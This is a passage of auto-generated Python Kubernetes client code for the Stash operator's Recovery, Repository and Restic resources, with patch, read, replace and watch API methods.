        """
        all_params = ['name', 'namespace', 'body', 'pretty']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch_stash_appscode_com_v1alpha1_namespaced_restic" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `patch_stash_appscode_com_v1alpha1_namespaced_restic`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `patch_stash_appscode_com_v1alpha1_namespaced_restic`")  # noqa: E501
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `patch_stash_appscode_com_v1alpha1_namespaced_restic`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics/{name}', 'PATCH',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1Restic',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def read_stash_appscode_com_v1alpha1_namespaced_recovery(self, name, namespace, **kwargs):  # noqa: E501
        """read_stash_appscode_com_v1alpha1_namespaced_recovery  # noqa: E501

        read the specified Recovery  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_recovery(name, namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Recovery (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Recovery
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.read_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, **kwargs)  # noqa: E501
        else:
            (data) = self.read_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, **kwargs)  # noqa: E501
            return data

    def read_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, name, namespace, **kwargs):  # noqa: E501
        """read_stash_appscode_com_v1alpha1_namespaced_recovery  # noqa: E501

        read the specified Recovery  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Recovery (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Recovery
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'pretty']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method read_stash_appscode_com_v1alpha1_namespaced_recovery" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `read_stash_appscode_com_v1alpha1_namespaced_recovery`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `read_stash_appscode_com_v1alpha1_namespaced_recovery`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries/{name}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1Recovery',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def read_stash_appscode_com_v1alpha1_namespaced_repository(self, name, namespace, **kwargs):  # noqa: E501
        """read_stash_appscode_com_v1alpha1_namespaced_repository  # noqa: E501

        read the specified Repository  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_repository(name, namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Repository (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Repository
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.read_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, **kwargs)  # noqa: E501
        else:
            (data) = self.read_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, **kwargs)  # noqa: E501
            return data

    def read_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, name, namespace, **kwargs):  # noqa: E501
        """read_stash_appscode_com_v1alpha1_namespaced_repository  # noqa: E501

        read the specified Repository  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Repository (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Repository
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'pretty']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method read_stash_appscode_com_v1alpha1_namespaced_repository" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `read_stash_appscode_com_v1alpha1_namespaced_repository`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `read_stash_appscode_com_v1alpha1_namespaced_repository`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories/{name}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1Repository',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def read_stash_appscode_com_v1alpha1_namespaced_restic(self, name, namespace, **kwargs):  # noqa: E501
        """read_stash_appscode_com_v1alpha1_namespaced_restic  # noqa: E501

        read the specified Restic  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_restic(name, namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Restic (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Restic
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.read_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, **kwargs)  # noqa: E501
        else:
            (data) = self.read_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, **kwargs)  # noqa: E501
            return data

    def read_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, name, namespace, **kwargs):  # noqa: E501
        """read_stash_appscode_com_v1alpha1_namespaced_restic  # noqa: E501

        read the specified Restic  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.read_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Restic (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Restic
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'pretty']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method read_stash_appscode_com_v1alpha1_namespaced_restic" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `read_stash_appscode_com_v1alpha1_namespaced_restic`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `read_stash_appscode_com_v1alpha1_namespaced_restic`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics/{name}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1Restic',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def replace_stash_appscode_com_v1alpha1_namespaced_recovery(self, name, namespace, body, **kwargs):  # noqa: E501
        """replace_stash_appscode_com_v1alpha1_namespaced_recovery  # noqa: E501

        replace the specified Recovery  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_recovery(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Recovery (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param ComGithubAppscodeStashApisStashV1alpha1Recovery body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Recovery
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.replace_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
        else:
            (data) = self.replace_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
            return data

    def replace_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, name, namespace, body, **kwargs):  # noqa: E501
        """replace_stash_appscode_com_v1alpha1_namespaced_recovery  # noqa: E501

        replace the specified Recovery  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Recovery (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param ComGithubAppscodeStashApisStashV1alpha1Recovery body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Recovery
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method replace_stash_appscode_com_v1alpha1_namespaced_recovery" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `replace_stash_appscode_com_v1alpha1_namespaced_recovery`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `replace_stash_appscode_com_v1alpha1_namespaced_recovery`")  # noqa: E501
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `replace_stash_appscode_com_v1alpha1_namespaced_recovery`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries/{name}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1Recovery',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def replace_stash_appscode_com_v1alpha1_namespaced_repository(self, name, namespace, body, **kwargs):  # noqa: E501
        """replace_stash_appscode_com_v1alpha1_namespaced_repository  # noqa: E501

        replace the specified Repository  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_repository(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Repository (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param ComGithubAppscodeStashApisStashV1alpha1Repository body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Repository
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.replace_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
        else:
            (data) = self.replace_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
            return data

    def replace_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, name, namespace, body, **kwargs):  # noqa: E501
        """replace_stash_appscode_com_v1alpha1_namespaced_repository  # noqa: E501

        replace the specified Repository  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Repository (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param ComGithubAppscodeStashApisStashV1alpha1Repository body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Repository
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method replace_stash_appscode_com_v1alpha1_namespaced_repository" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `replace_stash_appscode_com_v1alpha1_namespaced_repository`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `replace_stash_appscode_com_v1alpha1_namespaced_repository`")  # noqa: E501
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `replace_stash_appscode_com_v1alpha1_namespaced_repository`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories/{name}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1Repository',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def replace_stash_appscode_com_v1alpha1_namespaced_restic(self, name, namespace, body, **kwargs):  # noqa: E501
        """replace_stash_appscode_com_v1alpha1_namespaced_restic  # noqa: E501

        replace the specified Restic  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_restic(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Restic (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param ComGithubAppscodeStashApisStashV1alpha1Restic body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Restic
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.replace_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
        else:
            (data) = self.replace_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, **kwargs)  # noqa: E501
            return data

    def replace_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, name, namespace, body, **kwargs):  # noqa: E501
        """replace_stash_appscode_com_v1alpha1_namespaced_restic  # noqa: E501

        replace the specified Restic  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.replace_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, body, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Restic (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param ComGithubAppscodeStashApisStashV1alpha1Restic body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: ComGithubAppscodeStashApisStashV1alpha1Restic
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method replace_stash_appscode_com_v1alpha1_namespaced_restic" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `replace_stash_appscode_com_v1alpha1_namespaced_restic`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `replace_stash_appscode_com_v1alpha1_namespaced_restic`")  # noqa: E501
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `replace_stash_appscode_com_v1alpha1_namespaced_restic`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics/{name}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ComGithubAppscodeStashApisStashV1alpha1Restic',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def watch_stash_appscode_com_v1alpha1_namespaced_recovery(self, name, namespace, **kwargs):  # noqa: E501
        """watch_stash_appscode_com_v1alpha1_namespaced_recovery  # noqa: E501

        watch changes to an object of kind Recovery  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_recovery(name, namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Recovery (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: IoK8sApimachineryPkgApisMetaV1WatchEvent
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.watch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, **kwargs)  # noqa: E501
        else:
            (data) = self.watch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, **kwargs)  # noqa: E501
            return data

    def watch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, name, namespace, **kwargs):  # noqa: E501
        """watch_stash_appscode_com_v1alpha1_namespaced_recovery  # noqa: E501

        watch changes to an object of kind Recovery  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(name, namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str name: name of the Recovery (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
